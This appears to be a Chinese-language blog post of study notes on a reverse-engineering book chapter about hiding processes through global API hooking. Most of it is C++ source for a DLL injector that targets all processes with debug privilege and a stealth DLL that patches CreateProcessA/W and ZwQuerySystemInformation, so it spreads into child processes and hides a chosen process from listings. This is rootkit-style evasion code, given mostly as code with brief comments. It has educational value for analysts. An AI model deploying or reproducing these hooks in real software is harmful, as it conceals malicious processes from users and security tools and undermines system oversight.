第33章:隱藏程序-API程式碼修改技術(中)
阿新 • • 發佈:2020-08-06
全域性鉤取 API :
①Kernel32.CreatProcess() ,可以用來建立新程序,其它啟動執行程序的 API ( WinExec() , ShellExecute() , system() ) 在其內部也是呼叫此 API .
explorer.exe是 Windows 程式管理器或者檔案資源管理器,它用於管理 Windows 圖形殼,
包括桌面和檔案管理,刪除該程式會導致 Windows 圖形介面無法使用.
需要注意的是,這種尚未公開的 API 如果後期系統更新時發生了改變,就可能導致其無法生效.
此種方法也有問題,即無法對現在已經執行的程序進行隱藏,只能對未來的程序進行隱藏
HideProc2.cpp
int _tmain(int argc, TCHAR* argv[]) { int nMode = INJECTION_MODE; if( argc != 3 ) { printf("\n Usage : HideProc2.exe <-hide|-show> <dll path>\n\n"); // 少了 process name 這個引數. return 1; } // change privilege SetPrivilege(SE_DEBUG_NAME, TRUE);// Inject(Eject) Dll to all process if( !_tcsicmp(argv[1], L"-show") ) nMode = EJECTION_MODE; InjectAllProcess(nMode, argv[2]); return 0; }
與前面的程式碼只有main()函式少了一點,其它的都一樣.
Stealth2.cpp
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { char szCurProc[MAX_PATH] = {0,}; char *p = NULL; // HideProc2.exe 不能注入自己 GetModuleFileNameA(NULL, szCurProc, MAX_PATH); p = strrchr(szCurProc, '\\'); if( (p != NULL) && !_stricmp(p+1, "HideProc2.exe") ) return TRUE; // change privilege SetPrivilege(SE_DEBUG_NAME, TRUE); switch( fdwReason ) { case DLL_PROCESS_ATTACH : // 新增了對兩個函式的鉤取 // hook hook_by_code("kernel32.dll", "CreateProcessA", (PROC)NewCreateProcessA, g_pOrgCPA);
hook_by_code("kernel32.dll", "CreateProcessW", (PROC)NewCreateProcessW, g_pOrgCPW);
hook_by_code("ntdll.dll", "ZwQuerySystemInformation", (PROC)NewZwQuerySystemInformation, g_pOrgZwQSI); break; case DLL_PROCESS_DETACH : // unhook unhook_by_code("kernel32.dll", "CreateProcessA", g_pOrgCPA); unhook_by_code("kernel32.dll", "CreateProcessW", g_pOrgCPW); unhook_by_code("ntdll.dll", "ZwQuerySystemInformation", g_pOrgZwQSI); break; } return TRUE; }
BOOL WINAPI NewCreateProcessA( LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation ) { BOOL bRet; FARPROC pFunc; // unhook unhook_by_code("kernel32.dll", "CreateProcessA", g_pOrgCPA); // original API 呼叫 pFunc = GetProcAddress(GetModuleHandleA("kernel32.dll"), "CreateProcessA");
bRet = ((PFCREATEPROCESSA)pFunc)(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation); // 向生成的子程序注入 stealth2.cpp if( bRet ) InjectDll2(lpProcessInformation->hProcess, STR_MODULE_NAME); //CreatProcess 能直接獲取子程序的控制代碼. // hook hook_by_code("kernel32.dll", "CreateProcessA", (PROC)NewCreateProcessA, g_pOrgCPA); return bRet; }